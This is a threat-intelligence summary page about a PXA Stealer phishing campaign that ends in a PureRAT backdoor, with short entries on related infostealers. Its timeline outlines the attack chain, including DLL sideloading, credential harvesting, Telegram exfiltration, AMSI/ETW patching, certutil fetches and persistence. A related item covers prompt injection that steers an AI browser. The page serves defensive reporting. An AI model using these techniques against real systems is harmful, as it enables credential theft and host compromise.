PXA Stealer phishing-loader campaign
Campaign
Summary
Hide ▲
Show ▼
A multi-stage phishing campaign progressed into credential theft, layered loaders, and a final PureRAT deployment, increasing the risk of full host compromise and follow-on control. The chain relied on DLL sideloading, in-memory execution, and Telegram Bot API exfiltration to conceal activity and move stolen data out of the environment. Clues tied the operation to PXA Stealer, pointing to a maturing operator using both custom tooling and commodity malware.
Related Happenings
REMUS infostealer browser-session and password-manager collection expansion
Malware Activity
First: 15.05.2026 17:02
Last: 15.05.2026 17:02
Sources 1
About this happening:
**REMUS** expanded its **session-theft** and **password-manager** collection capabilities, increasing the malware’s ability to capture authenticated access and browser-side data....
REMUS infostealer browser-session and password-manager collection expansion
Malware ActivityAbout this happening: **REMUS** expanded its **session-theft** and **password-manager** collection capabilities, increasing the malware’s ability to capture authenticated access and browser-side data....
Vidar Stealer ClickFix campaign targeting multiple sectors
Campaign
First: 08.05.2026 14:00
Last: 08.05.2026 14:00
Sources 1
About this happening:
The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...
Vidar Stealer ClickFix campaign targeting multiple sectors
CampaignAbout this happening: The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware ActivityAbout this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Vidar Stealer 2.0 fake game-cheat distribution
Malware Activity
First: 18.03.2026 13:15
Last: 18.03.2026 13:15
Sources 1
About this happening:
The **Vidar Stealer 2.0** malware is being spread through **fake game-cheat repositories** and **Reddit lures**, putting players seeking cheats for major online games at risk of *...
Vidar Stealer 2.0 fake game-cheat distribution
Malware ActivityAbout this happening: The **Vidar Stealer 2.0** malware is being spread through **fake game-cheat repositories** and **Reddit lures**, putting players seeking cheats for major online games at risk of *...
Perplexity Comet prompt-injection research shows agentic browsers can be trained into phishing traps
Technical Analysis
First: 11.03.2026 18:38
Last: 11.03.2026 18:38
Sources 1
About this happening:
**Perplexity's Comet AI browser** is the focus of a **technical analysis** thread showing how **prompt injection** and **malicious URLs** can steer an agentic browser into **data...
Perplexity Comet prompt-injection research shows agentic browsers can be trained into phishing traps
Technical AnalysisAbout this happening: **Perplexity's Comet AI browser** is the focus of a **technical analysis** thread showing how **prompt injection** and **malicious URLs** can steer an agentic browser into **data...
Timeline
-
09.10.2025 17:01 2 articles · 7mo ago
PXA Stealer phishing campaign culminates in PureRAT backdoor
Initial DisclosureHuntress Labs describes a multi-stage phishing campaign against the affected organization that began with a ZIP archive disguised as a copyright infringement notice, used DLL sideloading and in-memory Python loaders, harvested Chrome and Firefox credentials, cookies, credit cards, and autofill data, and exfiltrated stolen ZIP archives through the Telegram Bot API. The chain then pivoted to .NET process hollowing via RegAsm.exe, patched AMSI and ETW to reduce visibility, used certutil.exe, is[.]gd, and 0x0[.]st to fetch later stages, created a Windows Update Service run key for persistence, and ultimately loaded Mhgljosy.dll and the commercially available PureRAT backdoor with TLS pinning for encrypted command-and-control.
Show sources
- From infostealer to full RAT: dissecting the PureRAT attack chain — www.bleepingcomputer.com — 09.10.2025 17:01
- From infostealer to full RAT: dissecting the PureRAT attack chain — www.bleepingcomputer.com — 09.10.2025 17:01